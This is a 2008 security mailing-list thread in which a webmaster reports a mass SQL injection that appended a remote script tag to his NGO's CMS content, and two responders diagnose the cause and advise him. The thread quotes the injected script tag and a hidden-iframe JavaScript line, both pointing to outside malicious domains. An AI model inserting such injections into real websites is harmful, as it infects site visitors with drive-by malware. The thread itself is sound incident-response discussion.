RE: eSafe quarantine: Re: Mysterious JavaScript appearance in website database

["Boaz Shunami" <BoazS () comsecglobal com>]

Hi Glenn,

Looks like it can be any number of attack vectors.

Your infrastructures are highly vulnerable (NT and IIS 4) and may
contain lots of vulnerabilities you're not aware of. Moreover, your
custom developed CMS which is probably ASP based may have application
security vulnerabilities. Have you tried to search your user's computers
hosts files for this domain (this may prove as an interesting attack
vector). I would highly recommend segregating this application and its
infrastructure from the internet (If possible).

Best Regards,

Boaz Shunami

Comsec Consulting

-----Original Message-----
From: Jon Oberheide [mailto:jon () oberheide org] 
Sent: Tuesday, April 15, 2008 12:53 AM
To: glenn () elaw org
Cc: incidents () securityfocus com
Subject: eSafe quarantine: Re: Mysterious JavaScript appearance in
website database

Looks like an SQL injection attack.

Take a look in your MS-SQL database at the affected entries and I bet
you'll see the nmidahena reference.

Since this is a widespread, automated attack that has affected other
sites, it's unlikely it was targeted at your specific organization or
custom CMS.  Give your codebase a thorough audit for SQL injection
vectors.

Regards,
Jon Oberheide

On Mon, 2008-04-14 at 16:03 -0700, Glenn Gillis wrote:
> On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
> U.S.-based NGO I work for mysteriously had a JavaScript URL appended
to 
> the titles of much of the content on our website:
>
>    <script src=http://www.nihaorr1.com/1.js></script>
>
> NB: the last modified dates for all of the content containing a 
> reference to this script are identical, right down the 1/100 second.
>
> The contents of the script apparently attempts to open an iframe to a
> non-existent domain, "nmidahena.com":
>
>    document.writeln("<iframe width=\'10\' height=\'1\'
> src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");
>
> I haven't found any reports of a new worm, etc. that might account for

> this, but when I Google "nmidahena.com" I get over 100,000 hits for
> other sites on which this script is present.
>
> We are running a custom-developed CMS with MS-SQL Server 2000 as the 
> backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The
NT 
> Server is fully patched with whatever OS, IIS and SQL Server 2K
hotfixes 
> released prior to NT4's end-of-life declaration by MS, for what it's
worth.)
> Anyone have an idea what might have caused this?
-- 
Jon Oberheide <jon () oberheide org>
GnuPG Key: 1024D/F47C17FE
Fingerprint: B716 DA66 8173 6EDD 28F6  F184 5842 1C89 F47C 17FE
**********************************************************************************************
IMPORTANT: The contents of this email and any attachments are confidential. They are intended for the 
named recipient(s) only.
If you have received this email in error, please notify the system manager or the sender immediately and do 
not disclose the contents to anyone or make copies thereof.
*** eSafe scanned this email for viruses, vandals, and malicious content. ***
**********************************************************************************************